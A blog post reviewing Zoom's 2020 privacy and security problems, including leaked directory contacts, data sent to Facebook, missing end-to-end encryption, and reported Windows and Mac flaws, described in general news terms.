Zoom has quickly become one of the most used apps in our new quarantine world, used by workplaces, schools, and everyday individuals to stay connected to one another. But how dangerous is the app really? And how much of our personal data is left vulnerable thanks to Zoom?
Leaking User Email Addresses and Photos
There have been countless issues surrounding Zoom, mostly are linked to ineffective security measures. Earlier this month Vice reported that at least a thousand Zoom users had their personal information, including their email address and photo, leaked to strangers. This enabled strangers to start video calls with them through Zoom.
This occurred as a result of Zoom’s ‘Company Directory’ feature, which automatically adds other people to a user’s list of contacts if they both share an email address with the same domain. While this feature did have the best intentions to make finding your work colleagues online much easier, many users reported that Zoom pooled them together and exposed their private information to one another despite signing up with their own personal email addresses.
Despite Zoom’s website stating that the feature acts by default to connect internal users in the same organisation, excluding publicly used domains such as gmail, yahoo, or Hotmail, many Dutch users found that Zoom connected them to thousands of strangers using domains that offer public email services.
@zoom_us I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional? #GDPR pic.twitter.com/bw5xZIGtSE
— Jeroen J.V Lebon (@JJVLebon) March 23, 2020
Sending Data to Facebook without User Permission
As if having strangers automatically added to your email and accessing your personal info wasn’t enough, Zoom was also forced to updated their iOS App earlier this year after a Motherboard analysis of the app found that it was sending data about its users to Facebook- whether they had a Facebook account or not.
Analytics data transferring is a topic that we’re used to seeing being linked to Facebook as many apps use Facebook’s software development kits (SDK) to implement features into their apps. However, many users are unaware of the fact that using one product (such as Zoom) may actually be providing data to another service.
What makes matters worse, there was nothing found in Zoom’s privacy policy that addressed this issue adequately. It’s policy stated that the company may collect user’s ‘Facebook profile information when you use Facebook to log-in to our Products or to create an account for our Products’, however it did not mention sending data to Facebook about Zoom users who do not own a Facebook account.
Instead, when a user downloads and opens the app, Zoom automatically connects to Facebook’s Graph API without user knowledge. Data related to your device (such as the model), the time zone and city you’re connecting from, your phone carrier, and unique advertiser identifiers which assist in targeting specific advertisements for you, are all sent to Facebook.
In responding to the Motherboard’s findings, Zoom stated:
“To address this, in the next few days, we will be removing the Facebook SDK and reconfiguring the feature so that users will still be able to login with Facebook via their browser…. We sincerely apologize for this oversight, and remain firmly committed to the protection of our users’ data.”
No End-to-End Encryption is Supported and Countless Flaws Leaving Users Vulnerable to Hijackers
If you thought that was the end of the list of security issues, I’m going to have to disappoint you here. Zoom also does not support end-to-end encryption on their video or audio content. Meaning a system which is typically in place to ensure content and data is protected and only available to the communicating parties using the video conferencing services, is not used by Zoom.
Techradar also reported that on Windows devices, criminals could exploit a flaw in the Zoom chat feature to steal user login details. Part of the chat feature converts URLs into hyperlinks, this is also the case for Windows networking UNC paths which if accessed, could reveal login information.
Hi @zoom_us & @NCSC – here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
Researcher, Patrick Wardle, found that one flaw in using Zoom on Apple Mac devices could allow cyber criminals to hijack your device by exploiting Zoom’s access rights on a device and giving hijackers control over your webcam and microphone. Another flaw uncovered allowed a hijacker to inject malicious code into Zoom’s installer program which would give access to the device’s operating system and allow them to install malware without the user noticing.
With all the negative buzz and anxiety felt about Zoom, I’m thinking it might be time to go back to old video conferencing services such as Skype. Although it appears Google might be swooping in to save the day by adding new features to their video conferencing services, such as a very Zoom-like gallery view on their Google Meet service.
Subscribe to FIB’s Weekly Alchemy Report for your weekly dose of music, fashion and pop culture news!